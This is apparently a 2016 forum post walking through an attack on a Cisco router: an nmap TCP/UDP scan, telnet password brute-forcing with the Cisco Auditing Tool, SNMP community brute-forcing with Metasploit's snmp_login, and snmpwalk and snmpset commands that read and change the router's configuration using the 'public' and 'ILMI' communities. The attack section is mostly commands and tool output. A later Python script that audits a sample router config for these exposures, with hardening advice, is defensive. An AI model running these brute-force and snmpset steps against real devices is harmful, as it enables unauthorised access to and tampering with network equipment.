Post Fri Aug 12, 2016 1:38 am

Simple Attack on a Cisco Router

Hello everybody,

I want to share how to do a simple attack on a router, in this case maybe a Cisco router.

First we must scan with nmap: we can combine TCP and UDP.

We hope the router has remote access (TCP) and SNMP (UDP) open.

Use BackTrack or Kali Linux:
nmap -sS -sU -T5 192.168.2.1

29954U@root:/pentest/cisco$ nmap -sS -sU -T5 192.168.2.1

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-05-12 09:04 EDT
Warning: 192.168.2.1 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.2.1
Host is up (0.0022s latency).
Not shown: 1248 closed ports, 749 open|filtered ports
PORT STATE SERVICE
23/tcp open telnet
79/tcp open finger
161/udp open snmp
MAC Address: 00:02:FD:60:77:20 (Cisco Systems)


Then you can see that ports 23/tcp and 161/udp are open, so we can attack now.

Telnet: we can brute-force using hydra or Cisco tools.

29954U@root:/pentest/cisco/cisco-auditing-tool$ ./CAT -h 192.168.2.1 -w /pentest/passwords/john/password.lst

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.2.1


Guessing passwords:

Invalid Password: cisco
Invalid Password: ciscos
Invalid Password: cisco1
Invalid Password: router


Now you can brute-force SNMP with msfconsole:

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.2.1
rhosts => 192.168.2.1
msf auxiliary(snmp_login) > set THREADS 3
threads => 3
msf auxiliary(snmp_login) > exploit

If it succeeds, you can see the read and write communities...

You can run the command

snmpwalk -mALL -v1 -c public 192.168.2.1

or, if you must exploit, you can make changes with

snmpset -c ILMI -v 2c 192.168.2.1 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1

All the techniques for making changes can be found in the wiki for snmpset.

Detailed lab: hackingdojo.com
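
Seen from the defending side, everything this post relies on (telnet on the vty lines, finger, the community strings public and ILMI, and the passwords CAT tried) is visible in the router's own configuration. The following Python check is an added example, not part of the original post; the sample running-config, the function name `audit` and the word lists are constructed for illustration.

```python
import re

# Constructed sample running-config (not from the post), mirroring the open ports it found.
SAMPLE_CONFIG = """\
hostname lab-router
service finger
snmp-server community public RO
snmp-server community ILMI RW
snmp-server community n0c-Mon1tor RO 10
line vty 0 4
 password cisco
 transport input telnet
line vty 5 15
 transport input ssh
"""

# Community strings and passwords that appear in the post itself.
GUESSABLE_COMMUNITIES = {"public", "ilmi"}
GUESSABLE_PASSWORDS = {"cisco", "ciscos", "cisco1", "router"}
SNMP_RE = re.compile(r"snmp-server community (\S+)(?:\s+(RO|RW))?(?:\s+(\S+))?", re.I)

def audit(config):
    """Return (line_number, finding) pairs for the exposures the post relies on."""
    findings = []
    vty = None  # header of the 'line vty' block being parsed, if any
    for n, raw in enumerate(config.splitlines(), 1):
        line = raw.strip()
        if not raw.startswith(" "):  # an unindented line starts a new section
            vty = line if line.startswith("line vty") else None
        snmp = SNMP_RE.match(line)
        pw = re.match(r"password (?:0 )?(\S+)$", line)  # cleartext passwords only
        if snmp:
            name, mode, acl = snmp.group(1), (snmp.group(2) or "RO").upper(), snmp.group(3)
            if name.lower() in GUESSABLE_COMMUNITIES:
                findings.append((n, f"guessable SNMP community '{name}' ({mode})"))
            if mode == "RW" and acl is None:
                findings.append((n, f"read-write community '{name}' has no ACL"))
        elif re.fullmatch(r"(service|ip) finger", line):
            findings.append((n, "finger service enabled"))
        elif vty and line.startswith("transport input"):
            if {"telnet", "all"} & set(line.split()[2:]):
                findings.append((n, f"telnet allowed on '{vty}'"))
        elif vty and pw and pw.group(1).lower() in GUESSABLE_PASSWORDS:
            findings.append((n, f"guessable password on '{vty}'"))
    return findings

if __name__ == "__main__":
    for n, finding in audit(SAMPLE_CONFIG):
        print(f"line {n}: {finding}")
```

On a real device the input would be the saved output of `show running-config`; each finding maps to a setting to remove or restrict (SSH-only vty transport, no finger, non-default communities bound to an ACL).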